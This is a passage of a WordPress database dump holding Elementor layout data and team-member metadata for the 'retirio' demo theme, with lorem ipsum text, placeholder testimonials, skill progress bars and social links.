fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"2790340\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"ef7e04a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"72ea037\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4c25ffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ffa8158\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(1319,930,'_elementor_page_assets','a:0:{}'),(1321,1037,'ova_team_met_avatar_id','925'),(1322,1037,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg'),(1323,1037,'ova_team_met_job','Interior designer'),(1324,1037,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(1325,1037,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(1326,1037,'ova_team_met_order_team','1'),(1327,1037,'_elementor_edit_mode','builder'),(1328,1037,'_elementor_template_type','wp-post'),(1329,1037,'_elementor_version','3.6.6'),(1330,1037,'_wp_page_template','default'),(1331,1037,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":85,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae15ef5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"470b41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfdd686\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5978ece\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"49a8f99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"94307b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"dfa29c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a9753bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2bb252b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"ebc310d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d308ac2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"51606ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f1abbd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4ae5e4e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"3802903\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"db13835\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fd33b43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50969ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dd5a46e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(1332,1037,'_elementor_page_assets','a:0:{}'),(1334,1100,'ova_team_met_avatar_id','924'),(1335,1100,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg'),(1336,1100,'ova_team_met_job','Architecture'),(1337,1100,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:19:\"https://twitter.com\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:40:\"https://www.facebook.com/ovatheme.envato\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.pinterest.com\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.instagram.com\";}}'),(1338,1100,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\nLorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.\r\n\r\nIf you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.'),(1339,1100,'ova_team_met_order_team','1'),(1340,1100,'_elementor_edit_mode','builder'),(1341,1100,'_elementor_template_type','wp-post'),(1342,1100,'_elementor_version','3.6.6'),(1343,1100,'_wp_page_template','default'),(1344,1100,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d8b366\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a409e2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f0314d9\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit 